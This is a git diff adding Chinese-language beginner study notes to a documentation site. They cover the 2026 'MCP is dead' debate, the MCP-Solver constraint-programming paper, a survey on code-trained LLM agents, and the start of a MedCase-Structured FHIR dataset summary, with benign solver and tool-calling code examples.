StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js"; +import { z } from "zod"; + +const server = new McpServer({ name: "demo-readonly", version: "1.0.0" }); + +server.tool( + "get_issue_title", + "Fetch Linear issue title by id (read-only demo)", + { id: z.string().describe("Linear issue id, e.g. ENG-123") }, + async ({ id }) => { + // 生产环境:在 server 内持 token,勿把 secret 返回给模型 + const res = await fetch("https://api.linear.app/graphql", { + method: "POST", + headers: { + Authorization: `Bearer ${process.env.LINEAR_API_KEY}`, + "Content-Type": "application/json", + }, + body: JSON.stringify({ + query: `{ issue(id: "${id}") { title } }`, + }), + }); + const json = await res.json(); + return { + content: [{ type: "text", text: json.data?.issue?.title ?? "not found" }], + }; + } +); + +const transport = new StdioServerTransport(); +await server.connect(transport); +``` + +**要点**:Server 端集中 credential;Host 只看见 tool schema。组织可以把此服务部署为 **HTTP MCP + OAuth**,同一实现服务 Cursor 与内部 Chat —— 这是 CLI 难以「一次编写、处处审计」的部分。 + +--- + +## 决策框架:什么时候仍用 MCP,什么时候 CLI/Skills 更好 + +| 场景 | 更倾向 | 理由 | +|------|--------|------| +| 本机 `gh`/`psql` 已认证 | **CLI / Bash** | 零 schema tax,调试透明 | +| 无 CLI 的 SaaS(部分协作工具) | **MCP 或官方 API Skill** | 没有更好的标准口 | +| 生产数据库、需只读/审计 | **MCP Server 网关** | 服务端拦截危险 SQL | +| 多客户端共享同一工具策略 | **HTTP MCP** | 集中 auth + schema 版本 | +| 个人编码 Agent 日常自动化 | **Skills + CLI 混合** | Quandri 实测省 ~21K tokens | +| 跨公司工具 marketplace | **MCP** | 互操作是协议存在理由 | + +**不要二选一宗教战争**:Better Questions 总结,Cloudflare / Pydantic / Zapcode 等团队收敛于 **「保留 MCP 作 schema 与发现层, invocation 方式再演进」** —— 换的是调用约定,不是删掉协议。 + +--- + +## 安全提醒:RCE 与「死不死」无关 + +2026 年多个安全分析指出:**实现不当的 MCP Server 可能带来任意命令执行(RCE)**——工具描述不可信、过度权限、prompt injection 触发危险 `tools/call`。这证明 MCP 需要**企业级硬化**(网关、沙箱、最小权限),但不能直接推出「协议已死」;类似「SQL 注入」不会让我们宣布 SQL 死亡。 + +--- + +## 与「USB-C 类比」的修正 + +2024–2025 年 MCP 被营销成 **「AI 的 USB-C」**;2026 年的修正版类比: + +- **USB-C 仍然正确**:统一插头形状(schema、auth、discovery)。 +- **需要补充**:你不该把**整台五金店**的 SKU 清单贴在桌布上(77 tools eager load);USB-C 也没规定你必须同时插入所有设备。 +- **CLI 像专用线**:只有一台显示器时,HDMI 线往往比 USB-C 坞更省事——**场景决定接口**,不是协议淘汰赛。 + +--- + +## 时间线(便于建立直觉) + +| 时间 | 事件 | +|------|------| +| 2024-11 | Anthropic 发布 MCP | +| 2025 中 | 「USB-C for AI」叙事峰值;大量 SaaS 上架 MCP badge | +| 2026-03 | Quandri「MCP is dead」;HN 热议;Perplexity 调整集成策略 | +| 2026 Q1–Q2 | Tool Search / deferred loading;Code execution with MCP 文章 | +| 2026-05 | MCP `2026-07-28` Release Candidate(无状态 HTTP 等) | +| 2026 展望 | 企业网关、token 优化、Extensions 成熟 — **采纳期而非葬礼** | + +--- + +## 小结:MCP 死了吗? + +**短答:没有。** 更准确的说法: + +1. **死的是「lazy MCP」**——把整 API 拆成几十个常驻工具、默认 eager load 的做法;社区 backlash 是在杀这种用法,Quandri 与 Hjarni 等文均持此观点。 +2. **CLI 赢了个人效率战**——在终端里已认证的开发者工作流,Bash 往往更省 token、更快、更好调试。 +3. **MCP 仍在赢互操作与治理战**——远程部署、OAuth、审计、多 Host 共享;协议还在通过 stateless HTTP、deferred loading、code mode 解决 2025 年的痛点。 +4. **聪明团队混合用**——CLI 跑高频路径,Skills 包工作流,MCP 接无 CLI 或需集中策略的系统。 + +若你零基础只记一句:**「MCP is dead」是 headline;真正结束的是「连接一切、一次加载全部工具」的时代,而不是 JSON-RPC 那根线本身。** + +--- + +## 延伸阅读 + +- 协议本体:本站 [[mcp-spec]] +- Quandri Engineering — [MCP is dead](https://www.quandri.io/engineering-blog/mcp-is-dead)(含测量方法与 Skills 实践) +- Charles Chen — [MCP is Dead; Long Live MCP!](https://chrlschn.dev/blog/2026/03/mcp-is-dead-long-live-mcp/)(stdio vs HTTP 分野) +- MCP 官方 — [2026-07-28 Release Candidate](https://blog.modelcontextprotocol.io/posts/2026-07-28-release-candidate/) +- Anthropic — Code execution with MCP(上下文优化模式) +- Hacker News — [MCP is dead; long live MCP](https://news.ycombinator.com/item?id=47380270) diff --git a/src/content/docs/papers/mcp-solver.md b/src/content/docs/papers/mcp-solver.md new file mode 100644 index 000000000..87d34affd --- /dev/null +++ b/src/content/docs/papers/mcp-solver.md @@ -0,0 +1,345 @@ +--- +title: MCP-Solver: Integrating Language Models with Constraint Programming Systems +来源: https://arxiv.org/abs/2501.00539 +日期: 2026-06-13 +分类: 机器学习 +子分类: 约束求解 +provenance: pipeline-v3 +--- + +# MCP-Solver: 把大语言模型和约束求解器连起来 + +## 一、从日常类比开始 + +想象你在玩数独游戏。 + +你靠直觉填了几个格子,但很快发现有些格子怎么都不对。这时候你有两个选择: + +1. 继续凭直觉猜 —— 可能猜错,也可能蒙对,但效率很低 +2. 找一个严格的逻辑推理助手,让它告诉你哪些数字绝对不能填 + +MCP-Solver 做的事情就是第 2 种。它让大语言模型(LLM)能够调用一个"严格的逻辑推理助手"——约束求解器。 + +为什么需要这样做?因为 LLM 有一个根本弱点:它的推理是基于概率的。给它一个逻辑谜题,LLM 可能会自信地给出错误答案。而约束求解器完全不同——它像一个数学证明机器,要么给出绝对正确的解,要么证明无解。 + +MCP-Solver 的关键创新在于:它通过一个叫 **MCP(Model Context Protocol)** 的标准协议,把 LLM 和求解器连接起来。LLM 负责理解人类语言、构建问题模型,求解器负责严格求解。两者各取所长。 + +## 二、核心概念拆解 + +### 2.1 什么是约束求解? + +约束求解的核心思想很简单: + +- 你有一组**变量**(比如"每个城市在行程中的第几个被访问") +- 你有一组**约束条件**(比如"不能重复访问同一个城市""总距离要最短") +- 求解器的工作就是找到一组变量的值,同时满足所有约束 + +这就像拼图:你有若干块拼图(变量),还有一些规则(约束),求解器帮你找出唯一合法的拼法。 + +### 2.2 MCP 协议是什么? + +MCP 是一个开源标准协议,让 AI 应用可以像"插 U 盘"一样连接外部工具。你可以把它理解为一个通用的"翻译层": + +- LLM 说:"我想求解这个问题" +- MCP 协议把它翻译成标准化的工具调用 +- 后端求解器执行计算,返回结果 +- MCP 再把结果翻译回 LLM 能理解的格式 + +### 2.3 MCP-Solver 支持的三种求解器 + +论文实现了三种求解后端,每种适合不同类型的问题: + +| 求解器 | 全称 | 适合的问题 | 类比 | +|--------|------|-----------|------| +| MiniZinc | 约束规划语言 | 调度、路由、排班 | 最接近自然语言的建模方式 | +| PySAT | 命题可满足性求解 | 布尔逻辑问题 | 纯粹的"真/假"推理 | +| Z3 | SAT Modulo Theories | 带数据类型的问题 | 支持整数、数组、位向量等丰富类型 | + +### 2.4 增量验证机制 + +这是 MCP-Solver 最有意思的设计之一。 + +当你让 LLM 构建一个求解模型时,它是一行一行写的。MCP-Solver 采用"边写边检查"的策略: + +1. LLM 添加一段代码(比如一个约束条件) +2. MCP-Solver 立即验证这段代码是否正确 +3. 如果正确,保存;如果有错误,立即告诉 LLM 哪里错了 +4. LLM 根据反馈修正,然后继续 + +这就像老师批改作业——不是等整份卷子写完才给分数,而是每写一步就指出错误,避免最后全盘推翻重来。 + +验证方式因求解器而异: +- MiniZinc:语法解析 + 类型检查 +- PySAT/Z3:使用 Python 的抽象语法树(AST)进行静态分析,能精确到行号和列号 + +## 三、代码示例 + +### 示例 1:旅行商问题(MiniZinc 模式) + +这是论文附录中的经典案例:一位女商人要从维也纳出发,访问奥地利全部 9 个省会城市后返回,求最短路线。 + +```minizinc +% 引入全局约束库 +include "globals.mzn"; + +% 城市数量:9 个省会 +int: n = 9; + +% 距离矩阵:dist[i, j] 表示城市 i 到城市 j 的距离(公里) +array[1..n, 1..n] of int: dist = +|[ 0, 65, 60, 184, 195, 319, 299, 478, 631| + |65, 0, 125, 119, 130, 254, 234, 413, 566| + |60, 125, 0, 184, 157, 281, 261, 440, 593| + |184,119, 184, 0, 208, 252, 136, 315, 468| + |195,130, 157, 208, 0, 136, 280, 459, 629| + |319,254, 281, 252, 136, 0, 217, 391, 566| + |299,234, 261, 136, 280, 217, 0, 188, 343| + |478,413, 440, 315, 459, 391, 188, 0, 157| + |631,566, 593, 468, 629, 566, 343, 157, 0]|; + +% 变量:tour[i] 表示行程中第 i 个城市是哪个(编号 1-9) +array[1..n] of var 1..n: tour; + +% 约束 1:所有城市不能重复访问 +constraint alldifferent(tour); + +% 约束 2:从维也纳(城市 1)出发 +constraint tour[1] = 1; + +% 计算总距离 +var int: total_distance = + sum(i in 1..n-1) (dist[tour[i], tour[i+1]]) + + dist[tour[n], tour[1]]; + +% 目标:最小化总距离 +solve minimize total_distance; +``` + +运行后,求解器返回最优解: + +``` +路线:维也纳 → 艾森施塔特 → 格拉茨 → 克拉根福 → 因斯布鲁克 → 布雷根茨 → 萨尔茨堡 → 林茨 → 圣珀尔滕 → 返回维也纳 +总距离:1,564 公里 +``` + +注意:LLM 在这里的角色是——你只用自然语言说"帮我找一个最短路线",LLM 会自动生成上面的 MiniZinc 代码,提交给求解器,再把结果翻译回人话告诉你。 + +### 示例 2:6 皇后 + 5 骑士(PySAT 模式) + +这是一个棋盘上的组合难题:在 6x6 棋盘上放置 6 个皇后和 5 个骑士,要求互不攻击。 + +```python +from pysat.formula import CNF +from pysat.solvers import Glucose3 +from pysat.card import * +import itertools + +# 棋盘尺寸 +board_size = 6 + +# 为每个格子的"是否有皇后/骑士"创建布尔变量 +var_count = 1 +var_mapping = {} + +def create_var(name): + global var_count + var_mapping[name] = var_count + var_count += 1 + return var_mapping[name] + +queen_at = {} # queen_at[(r, c)] = 变量:(r,c) 位置是否有皇后 +knight_at = {} # knight_at[(r, c)] = 变量:(r,c) 位置是否有骑士 + +for r in range(board_size): + for c in range(board_size): + queen_at[(r, c)] = create_var(f"queen_at_{r}_{c}") + knight_at[(r, c)] = create_var(f"knight_at_{r}_{c}") + +formula = CNF() + +# 约束 1:每个格子不能同时有皇后和骑士 +for r in range(board_size): + for c in range(board_size): + formula.append([-queen_at[(r, c)], -knight_at[(r, c)]]) + +# 约束 2:棋盘上恰好有 6 个皇后 +all_queens = [queen_at[(r, c)] for r in range(board_size) for c in range(board_size)] +for clause in exactly_k(all_queens, 6): + formula.append(clause) + +# 约束 3:棋盘上恰好有 5 个骑士 +all_knights = [knight_at[(r, c)] for r in range(board_size) for c in range(board_size)] +for clause in exactly_k(all_knights, 5): + formula.append(clause) + +# 约束 4:皇后之间不能互相攻击(除非中间有骑士挡着) +def are_aligned(r1, c1, r2, c2): + return r1 == r2 or c1 == c2 or abs(r1 - r2) == abs(c1 - c2) + +def positions_between(r1, c1, r2, c2): + positions = [] + if r1 == r2: + for c in range(min(c1, c2) + 1, max(c1, c2)): + positions.append((r1, c)) + elif c1 == c2: + for r in range(min(r1, r2) + 1, max(r1, r2)): + positions.append((r, c1)) + elif abs(r1 - r2) == abs(c1 - c2): + steps = abs(r1 - r2) - 1 + r_step = 1 if r2 > r1 else -1 + c_step = 1 if c2 > c1 else -1 + for i in range(1, steps + 1): + positions.append((r1 + i * r_step, c1 + i * c_step)) + return positions + +for (r1, c1), (r2, c2) in itertools.combinations( + [(r, c) for r in range(board_size) for c in range(board_size)], 2): + if are_aligned(r1, c1, r2, c2): + between = positions_between(r1, c1, r2, c2) + if not between: + formula.append([-queen_at[(r1, c1)], -queen_at[(r2, c2)]]) + else: + knight_vars = [knight_at[pos] for pos in between] + if knight_vars: + formula.append([-queen_at[(r1, c1)], -queen_at[(r2, c2)]] + knight_vars) + +# 约束 5:骑士和皇后互不攻击 +knight_moves = [(-2,-1),(-2,1),(-1,-2),(-1,2),(1,-2),(1,2),(2,-1),(2,1)] +for r1 in range(board_size): + for c1 in range(board_size): + for dr, dc in knight_moves: + r2, c2 = r1 + dr, c1 + dc + if 0 <= r2 < board_size and 0 <= c2 < board_size: + formula.append([-knight_at[(r1, c1)], -queen_at[(r2, c2)]]) + formula.append([-queen_at[(r1, c1)], -knight_at[(r2, c2)]]) + +# 约束 6:骑士之间互不攻击 +for r1 in range(board_size): + for c1 in range(board_size): + for dr, dc in knight_moves: + r2, c2 = r1 + dr, c1 + dc + if (0 <= r2 < board_size and 0 <= c2 < board_size and (r1, c1) < (r2, c2)): + formula.append([-knight_at[(r1, c1)], -knight_at[(r2, c2)]]) + +# 求解 +solver = Glucose3() +solver.append_formula(formula) +if solver.solve(): + model = solver.get_model() + # 打印棋盘布局... +else: + print("无解") +``` + +这个例子展示了 PySAT 模式的特点:把问题转化为 CNF(合取范式),然后用 SAT 求解器找出一组使公式为真的变量赋值。 + +### 示例 3:Z3 模式简介 + +Z3 模式适合需要丰富数据类型的场景。比如验证处理器奇偶校验逻辑: + +```python +from z3 import * + +# 定义一个 32 位的位向量 +data = BitVec('data', 32) + +# 定义奇偶校验位 +parity_bit = BitVec('parity', 1) + +# 约束:数据中 1 的个数应该与奇偶校验位匹配 +# 这里用 Z3 内置的 popcount(计算 1 的个数) +pop = Sum([Extract(i, i, data) for i in range(32)]) +solver = Solver() +solver.add(Xor(pop % 2, parity_bit) == 0) + +# 给一个具体的数据值 +solver.add(data == 0xDEADBEEF) + +if solver.check() == sat: + m = solver.model() + print(f"奇偶校验位应为: {m[parity_bit]}") +else: + print("无解 - 约束冲突") +``` + +Z3 的优势在于它能处理整数、位向量、数组、实数等多种类型,还能表达量词(forall/exists),适合更复杂的验证场景。 + +## 四、系统架构要点 + +MCP-Solver 的整体架构可以用一句话概括:**LLM 是人,求解器是计算器。** + +``` +┌─────────────┐ MCP 协议 ┌──────────────┐ +│ AI 聊天应用 │ ◄──────────────► │ MCP-Solver │ +│ (Claude等) │ 工具调用 │ Server │ +└─────────────┘ └──────┬───────┘ + │ + ┌────────────────────┼────────────────────┐ + │ │ │ + ┌─────▼─────┐ ┌──────▼──────┐ ┌─────────▼─────────┐ + │ MiniZinc │ │ PySAT │ │ Z3 │ + │ 约束规划 │ │ SAT 求解器 │ │ SMT 求解器 │ + └───────────┘ └─────────────┘ └───────────────────┘ +``` + +MCP-Solver 提供了 6 个标准工具: + +- `clear_model` — 清空当前模型 +- `add_item` — 在指定位置添加一段代码 +- `replace_item` — 替换指定位置的代码 +- `delete_item` — 删除指定位置的代码 +- `get_model` — 查看当前模型(带编号) +- `solve_model` — 求解模型,返回结果 + +每个操作后都会自动验证,确保模型一致性。 + +## 五、两种使用场景 + +### 场景 1:对话式建模(集成到 AI 聊天应用) + +用户在 Claude Desktop 里说:"帮我规划一个从维也纳出发访问所有奥地利省会的旅行路线"。LLM 自动: +1. 理解需求 +2. 通过 MCP 工具调用构建 MiniZinc 模型 +3. 提交求解 +4. 把结果翻译回人话 + +用户还可以随时修改需求:"加一个条件,我在格拉茨要待两天",LLM 自动调整模型并重新求解。 + +### 场景 2:自主多智能体系统 + +MCP-Solver 还包含一个轻量级客户端,实现了 ReAct 代理模式: + +- ReAct 代理:自动决定是否需要调用求解器,自行迭代修正 +- Reviewer 代理:专门检查求解结果是否正确,给出"正确/错误/未知"的判断 + +这种双代理设计提高了可靠性——即使 LLM 第一次建模范式有误,Reviewer 也能发现并触发重新求解。 + +## 六、为什么这件事重要 + +LLM 的能力边界很清晰: + +- 擅长:理解自然语言、创意生成、代码编写、模式识别 +- 不擅长:严格逻辑推理、数学证明、组合优化 + +MCP-Solver 的意义在于提供了一个**通用的桥接框架**: + +1. **标准化**:通过 MCP 协议,任何支持 MCP 的 LLM 应用都能接入求解能力 +2. **通用性**:支持三种不同的求解范式,覆盖从简单布尔逻辑到复杂约束优化的广泛问题 +3. **交互性**:增量验证让 LLM 能在构建过程中获得即时反馈,而不是一次性提交后才发现错误 +4. **教育价值**:用户可以观察到自然语言如何被形式化为求解模型,是一种很好的学习方式 + +## 七、局限与展望 + +论文也坦诚了当前的限制: + +- 求解是同步进行的,长时间求解会阻塞(计划中添加异步求解) +- 复杂问题的自动编码仍需人工干预 +- 目前每轮会话只使用一种求解器后端(未来可能加入路由代理自动选择) + +作者提到的未来方向包括:MaxSAT 支持、异步求解接口、更多后端(如模型计数器)、以及支持实例数据处理(如图表或表格数据)。 + +## 八、我的理解总结 + +用一句话概括:**MCP-Solver 让 LLM 从"猜测者"变成了"协调者"**——LLM 不需要自己算出正确答案,它只需要把问题正确地描述给求解器,然后解读结果。这就像从"让学生自己解题"变成了"让学生学会使用计算器"。 + +对于学习者来说,这个项目也是一个极好的理解"形式化方法"的入口——通过自然语言到求解模型的转换过程,你能直观地看到如何将模糊的现实问题转化为精确的数学约束。 diff --git a/src/content/docs/papers/mcp-spec.md b/src/content/docs/papers/mcp-spec.md index 256e540bd..473721140 100644 --- a/src/content/docs/papers/mcp-spec.md +++ b/src/content/docs/papers/mcp-spec.md @@ -153,5 +153,7 @@ Claude Desktop 配一个本地 MCP 服务器,启动时 fork 子进程,stdin/ - [[anthropic-circuits]] —— Anthropic Circuits — 把 Transformer 当电路逆向 - [[anthropic-prompt-caching]] —— Anthropic Prompt Caching — 让长 prompt 只算一次,后续只付 10% +- [[language-server-protocol-spec]] —— Language Server Protocol — 让编辑器共享同一套「语言大脑」的 USB 协议 +- [[mcp-is-dead-debate]] —— MCP Is Dead? — 2026 年协议存废之争零基础笔记 - [[rest-fielding-2000]] —— REST — Fielding 2000 给 Web API 写下的设计宪法 diff --git a/src/content/docs/papers/mcp-survey.md b/src/content/docs/papers/mcp-survey.md new file mode 100644 index 000000000..e47291a05 --- /dev/null +++ b/src/content/docs/papers/mcp-survey.md @@ -0,0 +1,277 @@ +--- +title: From LLMs to MCPs: How Code Empowers Large Language Models to Serve as Intelligent Agents +来源: https://arxiv.org/abs/2401.00812 +日期: 2026-06-13 +分类: 机器学习 +子分类: LLM架构 +provenance: pipeline-v3 +--- + +# 从大语言模型到智能体:代码如何让 LLM 拥有"魔法" + +## 一句话总结 + +这篇论文说了一件事:**LLM 本身只是一个"巫师",代码才是让它施展法术的"魔杖"**。通过把代码融入训练数据,LLM 获得了推理能力、结构化表达能力和与外部世界交互的能力,最终进化成了能自主规划、执行、反思的智能体(Agent),以及今天我们能看到的 MCP(Model Context Protocol)生态。 + +--- + +## 一、从日常类比开始:厨师与菜谱 + +想象一个天才厨师。他尝一口就知道味道好不好,能凭直觉做出美味。但他每次做菜全靠感觉——有时惊艳,有时翻车。 + +现在给他一本菜谱。菜谱有标准格式("盐 5g,油 15ml,中火 3 分钟"),有步骤顺序("先炒香葱,再放肉"),可以拆成小块("酱汁单独做"),还能反复运行(照做一遍,再做一遍,结果一样)。 + +厨师拿到菜谱后,发生了三件事: + +1. **推理能力变强了**:他开始理解"为什么先炒葱再放肉",而不仅仅是"怎么做" +2. **表达变精确了**:每一步都清晰可复现,不再靠"适量""少许"这种模糊词 +3. **能跟厨房设备联动了**:他知道菜谱里的"中火"对应电磁炉的哪个档位 + +**LLM 和代码的关系,就是这个厨师和菜谱的关系。** + +--- + +## 二、核心概念拆解 + +### 2.1 代码的四个特性 + +论文指出,代码之所以能成为 LLM 的"魔杖",是因为它有四个独特属性: + +| 特性 | 说明 | 类比 | +|------|------|------| +| **标准语法** | 有固定规则,不像自然语言那样歧义重重 | 菜谱的计量单位是克和毫升 | +| **逻辑一致性** | 程序要么正确运行,要么报错,没有"差不多" | 按照菜谱做,味道就是那个味道 | +| **抽象能力** | 可以把复杂操作封装成函数,重复调用 | 把"炒肉"封装成一个步骤,随时复用 | +| **模块化** | 不同功能拆成独立模块,互不影响 | 酱汁、主菜、配菜各自独立准备 | + +### 2.2 代码给 LLM 带来的三大能力 + +#### 能力一:解锁推理能力 + +没有代码训练的 LLM 就像只会背课文的学生——能复述"勾股定理",但不会用它解题。 + +有了代码训练后,LLM 学会了**把大问题拆成小步骤**。这就是我们后来看到的 Chain-of-Thought(思维链)推理的基础。 + +#### 能力二:产生结构化中间步骤,连接外部工具 + +代码是"结构化语言",LLM 学会写代码后,就能输出**格式精确、可执行的中间步骤**。这些步骤可以直接对接外部工具——这就是 Function Calling 和 MCP 的前身。 + +#### 能力三:利用编译执行环境获得反馈 + +代码写错了会报错。LLM 看到错误信息,就能修正自己的思路。这个"试错-修正"循环,是 Agent 自我改进的核心机制。 + +### 2.3 从 LLM 到 Agent 的进化路径 + +论文梳理了这条进化线: + +``` +纯文本 LLM(只会聊天) + ↓ +加入代码训练(学会推理和结构化表达) + ↓ +Function Calling(能调用外部工具) + ↓ +Agent 框架(能规划、执行、反思的自主系统) + ↓ +MCP 生态(标准化的工具协议) +``` + +--- + +## 三、代码示例 + +### 示例一:没有代码训练的 LLM vs 有代码训练的 LLM + +**场景**:让 LLM 计算"从北京到上海,高铁时速 300km,距离 1200km,需要几小时?" + +**没有代码训练的 LLM**(可能直接猜一个数字,或者给出模糊推理): + +``` +用户:北京到上海高铁要多久? +LLM:嗯……大概几个小时吧,我猜5到6个小时左右? +``` + +**有代码训练的 LLM**(会写出可执行的计算步骤): + +```python +distance = 1200 # 公里 +speed = 300 # km/h +time = distance / speed # 时间 = 距离 ÷ 速度 +print(f"需要 {time} 小时") +# 输出:需要 4.0 小时 +``` + +区别在哪?代码训练让 LLM 学会了**把自然语言问题翻译成精确的计算步骤**,而不是靠"感觉"回答。 + +### 示例二:从 Function Calling 到 Agent 的演进 + +**场景**:让 LLM 帮用户查天气并推荐穿衣 + +**第一步:Function Calling(单个工具调用)** + +```python +# LLM 输出的结构化调用 +def get_weather(city: str) -> dict: + """查询指定城市的天气""" + return {"city": city, "temp": 22, "condition": "多云"} + +# LLM 决定调用 +result = get_weather("北京") +``` + +**第二步:Agent Loop(多步规划 + 工具调用 + 反思)** + +```python +class WeatherAgent: + def __init__(self): + self.memory = [] # 记录对话历史 + + def plan(self, user_request: str) -> list: + """把用户请求拆成可执行步骤""" + return [ + {"tool": "get_weather", "args": {"city": "北京"}}, + {"tool": "recommend_clothes", "args": {"temp": "{{result.temp}}"}}, + ] + + def execute(self, plan: list) -> str: + """逐步执行计划,根据中间结果调整""" + for step in plan: + tool_name = step["tool"] + result = self.call_tool(tool_name, step["args"]) + self.memory.append({"step": tool_name, "result": result}) + + # 反思:检查结果是否需要调整下一步 + if result.get("temp", 0) < 10: + return "今天很冷,建议穿羽绒服!" + elif result.get("temp", 0) < 20: + return "天气凉爽,建议穿外套。" + else: + return "天气炎热,建议穿短袖。" + + def call_tool(self, tool_name: str, args: dict) -> dict: + """调用具体的工具函数""" + if tool_name == "get_weather": + return {"city": args["city"], "temp": 8, "condition": "晴"} + elif tool_name == "recommend_clothes": + return {"advice": "需要厚外套"} + return {} + +# 使用 +agent = WeatherAgent() +response = agent.execute(agent.plan("北京今天天气怎么样?穿什么?")) +print(response) +# 输出:今天很冷,建议穿羽绒服! +``` + +这个例子展示了论文说的核心思想:**代码让 LLM 从"被动回答问题"变成"主动规划、执行、反思"的智能体**。 + +### 示例三:MCP 协议的思想源头 + +MCP(Model Context Protocol)的本质是什么?论文虽然没有直接提到 MCP(论文发表于 2024 年 1 月,MCP 是后来 Anthropic 提出的标准化协议),但它描述的"结构化中间步骤连接外部执行端"正是 MCP 的核心思想。 + +```python +# 简化版 MCP 思想:标准化的工具描述 + 标准化的调用协议 + +# 1. 工具注册(相当于 MCP 的 tool 定义) +TOOLS = { + "get_weather": { + "description": "查询城市天气", + "parameters": { + "city": {"type": "string", "description": "城市名称"} + } + }, + "send_email": { + "description": "发送邮件", + "parameters": { + "to": {"type": "string"}, + "subject": {"type": "string"}, + "body": {"type": "string"} + } + } +} + +# 2. LLM 输出标准化的工具调用格式 +def llm_call_tool(tool_name: str, parameters: dict) -> dict: + """LLM 通过统一接口调用任何已注册的 tool""" + if tool_name not in TOOLS: + return {"error": f"未知工具: {tool_name}"} + + # 验证参数类型 + for param_name, param_info in TOOLS[tool_name]["parameters"].items(): + if param_name not in parameters: + return {"error": f"缺少参数: {param_name}"} + if not isinstance(parameters[param_name], param_info["type"]): + return {"error": f"参数 {param_name} 类型错误"} + + # 执行工具(这里用模拟实现) + if tool_name == "get_weather": + return {"temperature": 22, "condition": "晴"} + elif tool_name == "send_email": + return {"status": "sent", "message_id": "abc123"} + +# 3. LLM 根据工具返回结果生成最终回答 +tool_result = llm_call_tool("get_weather", {"city": "北京"}) +final_response = f"北京今天{tool_result['condition']},气温{tool_result['temperature']}°C。" +print(final_response) +# 输出:北京今天晴,气温22°C。 +``` + +这就是 MCP 协议的灵魂:**用一套统一的协议,让 LLM 能调用任何工具**。而这套协议的理论基础,正是论文所阐述的"代码赋予 LLM 的结构化表达能力"。 + +--- + +## 四、论文的关键贡献 + +### 4.1 首次系统梳理"代码训练"对 LLM 的影响 + +在 GPT-4 时代之前,大家普遍认为代码训练只是为了让 LLM 学会写代码。这篇论文第一次明确指出: + +- 代码训练的真正价值不在"写代码"本身 +- 而在代码带来的**推理能力、结构化表达、可执行反馈**这三个深层能力 + +### 4.2 提出了 LLM → Agent 的完整进化图谱 + +论文把从纯文本 LLM 到智能体的发展脉络理得很清楚,为后来所有的 Agent 框架(AutoGPT、BabyAGI、LangChain Agent、OpenAI Functions、MCP 等)提供了理论框架。 + +### 4.3 指出了未来的挑战 + +论文最后提到了几个关键挑战,其中很多在今天仍然相关: + +1. **代码幻觉**:LLM 生成的代码看起来对,但实际运行有问题 +2. **工具选择的准确性**:面对多个可用工具时,LLM 如何选对? +3. **长程依赖**:复杂任务中,早期步骤的错误会影响整个执行链 +4. **安全与可控性**:Agent 自主执行代码,如何防止恶意操作? + +--- + +## 五、这篇论文和我的学习路线有什么关系? + +你正在学习的 MCP(Model Context Protocol),它的理论基础就在这篇论文里。 + +具体来说: + +- **MCP 解决了什么问题?** 论文说"LLM 需要通过结构化的中间步骤连接外部执行端",MCP 就是这个"连接协议"的标准化实现 +- **为什么 MCP 用 JSON-RPC?** 因为代码训练让 LLM 擅长处理结构化数据,JSON-RPC 是最适合 LLM 理解和生成的协议格式之一 +- **为什么 MCP 要把工具描述写成 schema?** 因为论文强调代码的"标准语法"特性——结构化工具描述让 LLM 能精确理解每个工具的输入输出 + +简单说:**没有这篇论文说的"代码赋能",就没有 MCP 存在的意义**。 + +--- + +## 六、小结 + +这篇论文用一个精妙的比喻概括了自己的核心观点: + +> "如果 LLM 是巫师,那么代码就是魔杖。" + +巫师本身有天赋,但如果没有魔杖,他的魔法只能停留在口头。代码就是那根魔杖——它让 LLM 从"会说"变成了"能做"。 + +从 Function Calling 到 Agent 框架,再到 MCP 协议,都是这根"魔杖"的不同形态。理解了这一点,你就理解了整个现代 LLM Agent 生态的理论根基。 + +--- + +## 思考题 + +1. 如果你要让一个没有代码训练基础的 LLM 学会"查天气后推荐穿衣",你会怎么设计训练数据? +2. MCP 协议相比 OpenAI 的 Function Calling,在"结构化表达"上做了哪些改进? +3. 论文提到的"代码幻觉"问题,在你日常使用 Copilot 或 Cursor 时遇到过吗?具体表现是什么? diff --git a/src/content/docs/papers/medcase-fhir.md b/src/content/docs/papers/medcase-fhir.md new file mode 100644 index 000000000..86d39becd --- /dev/null +++ b/src/content/docs/papers/medcase-fhir.md @@ -0,0 +1,344 @@ +--- +title: MedCase-Structured — Text-to-FHIR 临床诊断推理数据集(零基础学习笔记) +来源: https://arxiv.org/abs/2605.30295 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:病历口述 vs 医院信息系统 + +想象你是一名住院医,向主任汇报病例时有两种方式: + +- **口述版(纯文本)**:「45 岁女性,左臂和腋下起水疱样皮疹三天,伴主观发热,既往无特殊……」——信息都在一段话里,主任靠临床经验串起来想诊断。 +- **系统版(结构化 EHR)**:同一位病人已经录进医院信息系统:人口学在 **Patient**,就诊在 **Encounter**,主诉拆成多条 **Condition**,化验在 **Observation**,每条还带 **SNOMED CT / LOINC / RxNorm** 标准编码。主任要在表格、编码和引用关系里「拼图」。 + +很多 AI 论文只在**口述版**上测诊断准确率——像在作文比赛里拿高分。真正部署到临床决策支持系统(CDSS)时,模型面对的是**系统版**:FHIR Bundle、术语表、资源引用、日期字段、诊断是否被刻意隐藏。2026 年 5 月发表的 **MedCase-Structured**(arXiv:[2605.30295](https://arxiv.org/abs/2605.30295),ICML 2026 SD4H 投稿)正是为了填这个评测鸿沟:把医生写的病例叙事,转成**可互操作的 HL7 FHIR R4 患者 Bundle**,再测大模型在「像真 EHR」输入上的诊断推理能力。 + +论文的核心发现很反直觉:**同一批病例,换成 FHIR 结构化输入后,主流 LLM 的诊断准确率普遍下降**——说明「会读病历故事」≠「会在 EHR 里推理」。 + +一句话:**MedCase-Structured 不是又一个医学 QA 题库,而是把评测场景从「作文」搬到「医院信息系统界面」。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 全称 | MedCase-Structured: A Text-to-FHIR Dataset for Benchmarking Diagnostic Reasoning in Clinically Realistic EHR Settings | +| 作者 | Valentina Bui Muti, Eugénie Dulout, Ziquan Fu | +| 上游数据 | [MedCaseReasoning](https://github.com/kevinwu23/Stanford-MedCaseReasoning)(NeurIPS 2025,约 14,489 例临床病例报告) | +| 输出格式 | HL7 **FHIR R4** `Bundle`(`type: collection`),术语经 SNOMED CT / LOINC / RxNorm / CVX 校验 | +| 数据集仓库 | [SystemInternal/MedCase-Structured](https://github.com/SystemInternal/MedCase-Structured) | +| 规模 | 过滤后成功转换 **1,408** 例(占进入流水线的 **82.5%**);测试集可用 **95** 例(原 test 897 例) | +| 生成模型 | Claude Sonnet 4(`claude-sonnet-4-20250514`,temperature=0) | + 